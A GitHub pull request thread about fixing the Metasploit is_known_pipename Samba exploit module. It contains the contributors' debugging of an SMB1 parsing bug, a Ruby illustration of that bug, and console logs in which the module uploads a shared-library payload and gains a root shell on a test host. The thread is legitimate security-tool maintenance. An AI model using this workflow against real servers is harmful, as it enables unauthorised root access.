
Fix is_known_pipename module #14035

Merged
merged 3 commits into from
Sep 23, 2020

Conversation

cdelafuente-r7
Contributor

@cdelafuente-r7 cdelafuente-r7 commented Aug 21, 2020

This fixes part of #13976.

This requires these fixes in RubySMB library, which are not merged yet: rapid7/ruby_smb#163
To test this PR, RubySMB will need to be used from source until this PR is merged and a new gem is released:
- Do: git clone https://github.com/cdelafuente-r7/ruby_smb
- Do: cd path/to/ruby_smb
- Do: git checkout fix_for_old_samba_compatibility
- Add this to your Gemfile: gem 'ruby_smb', :path => 'path/to/ruby_smb'
- Do: bundle install
UPDATE: The PR has been merged and a new ruby_smb gem has been released. I updated the Gemfile.lock to reflect this.

This has been tested against Samba 3.5.4, 3.6.6 and 4.1.11.

Verification

  • Start msfconsole
  • use linux/samba/is_known_pipename
  • set RHOSTS <host>
  • set SMBUSER <username>
  • set SMBPASS <password>
  • exploit
  • Verify it does not break
  • Verify a session is created

@smcintyre-r7
Contributor

I'm going to mark this delayed. rapid7/ruby_smb#163 has been landed (and please correct me if I'm wrong), but you didn't want a release to be made until you had a chance to look at another issue, and this is blocked until a new release is made, right?

@smcintyre-r7 smcintyre-r7 added the blocked Blocked by one or more additional tasks label Aug 24, 2020
@cdelafuente-r7
Contributor Author

That's correct! Thanks for the review! I'll let you know when the new ruby_smb gem is released.

@cdelafuente-r7 cdelafuente-r7 removed the blocked Blocked by one or more additional tasks label Aug 28, 2020
@cdelafuente-r7
Contributor Author

@smcintyre-r7, a new ruby_smb gem has been released and I updated Gemfile.lock.

@smcintyre-r7
Contributor

Well, I tested this and I couldn't get the module to work without commenting out these lines in RubySMB.

With the RubySMB exception
msf6 exploit(linux/samba/is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.168.159.51   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER      test             no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME  NetApps          no        The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf6 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[-] 192.168.159.51:445 - Write NetApps\test\zGydx.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\JANSI.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\test\oTAzH.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[-] 192.168.159.51:445 - Enum print$: The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[-] 192.168.159.51:445 - Write NetApps\test\AWscL.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\tdajl.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\test\fcWJD.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER
[-] 192.168.159.51:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
msf6 exploit(linux/samba/is_known_pipename) >
Without the RubySMB exception
msf6 exploit(linux/samba/is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.168.159.51   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER      test             no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME  NetApps          no        The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf6 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[*] 192.168.159.51:445 - Using location \\192.168.159.51\NetApps\test for the path
[*] 192.168.159.51:445 - Retrieving the remote path of the share 'NetApps'
[*] 192.168.159.51:445 - Share 'NetApps' has server-side path '/data/network-applications
[*] 192.168.159.51:445 - Using payload wrapper 'samba-root-findsock-x86_64'...
[*] 192.168.159.51:445 - Uploaded payload to \\192.168.159.51\NetApps\test\HajBLyRP.so
[*] 192.168.159.51:445 - Loading the payload from server-side path /data/network-applications/test/HajBLyRP.so using \\PIPE\/data/network-applications/test/HajBLyRP.so...
[+] 192.168.159.51:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.159.51:445) at 2020-08-28 12:12:39 -0400

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/tmp

I think the root cause is this check in EmptyPacket. From debugging I can confirm with certainty that the parameter_block.word_count and data_block.byte_count values are both non-zero. What's confusing is that the response's representation in the error includes that the status was successful.

@cdelafuente-r7
Contributor Author

Thanks for testing this @smcintyre-r7! I tracked down the issue and it is related to a bug in SMB1 Trans2 response packet structures. This has been fixed in rapid7/ruby_smb#165.

RubySMB tries to parse the response packet as an EmptyPacket when something went wrong with parsing the original packet structure (RubySMB::SMB1::Packet::Trans2::SetFileInformationResponse in this case), but the valid? routine detects that it is not a correct EmptyPacket and returns false.

I'm going to mark this PR as delayed again until rapid7/ruby_smb#165 has been landed.
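As an added illustration of the parse-then-fall-back flow described in the two comments above (this is not RubySMB code, and it does not reproduce the actual structure defect fixed in rapid7/ruby_smb#165): the packet layout, the `expected_words` stand-in for the misdefined structure, and the sample reply are all constructed here.

```ruby
# Added example, not RubySMB code: a minimal model of the parse-then-fall-back flow
# described above. Command 50 (0x32) is SMB_COM_TRANSACTION2. Constructed layout
# (not the full SMB1 header): "\xFFSMB", command (1 byte), NTSTATUS (4 LE),
# word_count (1), 2*word_count parameter bytes, byte_count (2 LE), data bytes.
SMB_COM_TRANSACTION2 = 50
STATUS_SUCCESS = 0x00000000
class ParseError < StandardError; end
def parse_header(raw)
  raise ParseError, 'not an SMB1 packet' unless raw[0, 4] == "\xFFSMB".b
  { command: raw.getbyte(4), status: raw[5, 4].unpack1('V') }
end
def parse_blocks(raw)
  word_count = raw.getbyte(9)
  byte_count = raw[10 + word_count * 2, 2].unpack1('v')
  { word_count: word_count, byte_count: byte_count }
end

# Strict structure-specific parser. expected_words stands in for the misdefined field
# layout: when it disagrees with the reply, parsing raises, as the real (different)
# structure error fixed in ruby_smb#165 did.
def parse_trans2_response(raw, expected_words)
  hdr = parse_header(raw)
  blocks = parse_blocks(raw)
  unless hdr[:command] == SMB_COM_TRANSACTION2 && blocks[:word_count] == expected_words
    raise ParseError, "structure mismatch: word_count=#{blocks[:word_count]}"
  end
  hdr.merge(blocks)
end

# EmptyPacket#valid? in spirit: right command and no parameter words or data bytes.
def empty_packet_valid?(raw)
  hdr = parse_header(raw)
  blocks = parse_blocks(raw)
  hdr[:command] == SMB_COM_TRANSACTION2 && blocks[:word_count].zero? && blocks[:byte_count].zero?
end

# Returns :parsed, :empty_packet, or the misleading error text seen in the thread.
def read_trans2(raw, expected_words)
  parse_trans2_response(raw, expected_words)
  :parsed
rescue ParseError
  return :empty_packet if empty_packet_valid?(raw)
  hdr = parse_header(raw)
  # Both commands print as 50 and status is STATUS_SUCCESS, so the message hides the
  # real cause: non-zero word_count/byte_count failed the EmptyPacket check.
  format('Expecting SMB1 protocol with command=%d, got SMB1 protocol with command=%d, Status: (0x%08X)', SMB_COM_TRANSACTION2, hdr[:command], hdr[:status])
end

# Constructed reply: command 50, STATUS_SUCCESS, 10 parameter words, 2 data bytes.
SAMPLE_REPLY = "\xFFSMB".b + [SMB_COM_TRANSACTION2, STATUS_SUCCESS].pack('CV') + [10].pack('C') + ("\x00" * 20).b + [2].pack('v') + "\x00\x00".b
```

With a structure definition matching the reply (`read_trans2(SAMPLE_REPLY, 10)`) the packet parses; with a mismatched one (`read_trans2(SAMPLE_REPLY, 11)`) the fallback fails and the same "command=50, got command=50 ... STATUS_SUCCESS" text appears, which is why the module's error looked self-contradictory.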

@cdelafuente-r7 cdelafuente-r7 added the blocked Blocked by one or more additional tasks label Sep 23, 2020
@smcintyre-r7 smcintyre-r7 removed the blocked Blocked by one or more additional tasks label Sep 23, 2020
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

With the latest RubySMB (2.0.6) changes this is now working as intended:

msf6 exploit(linux/samba/is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf6 exploit(linux/samba/is_known_pipename) > set RHOSTS 192.168.159.51
RHOSTS => 192.168.159.51
msf6 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER test
SMB_FOLDER => test
msf6 exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME NetApps
SMB_SHARE_NAME => NetApps
msf6 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.168.159.51:445 - Using location \\192.168.159.51\NetApps\test for the path
[*] 192.168.159.51:445 - Retrieving the remote path of the share 'NetApps'
[*] 192.168.159.51:445 - Share 'NetApps' has server-side path '/data/network-applications
[*] 192.168.159.51:445 - Uploaded payload to \\192.168.159.51\NetApps\test\uXMZXHua.so
[*] 192.168.159.51:445 - Loading the payload from server-side path /data/network-applications/test/uXMZXHua.so using \\PIPE\/data/network-applications/test/uXMZXHua.so...
[+] 192.168.159.51:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.159.51:445) at 2020-09-23 17:44:03 -0400

id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 1? [y/N]  y

[*] 192.168.159.51 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(linux/samba/is_known_pipename) >

I've removed the delayed tag, then I'll bump the RubySMB version in the Gemfile as I land this. Thanks @cdelafuente-r7!

@smcintyre-r7
Contributor

smcintyre-r7 commented Sep 23, 2020

Release Notes

Fixed an issue in the exploits/linux/samba/is_known_pipename exploit module, which targets Samba. There was an incorrect SMB version 1 data structure definition that was causing the module to fail to verify a writeable directory.

@pbarry-r7 pbarry-r7 added the rn-fix release notes fix label Sep 29, 2020
Labels
bug module rn-fix release notes fix
Successfully merging this pull request may close these issues.

Can get false failures from verify_writeable_directory in is_known_pipename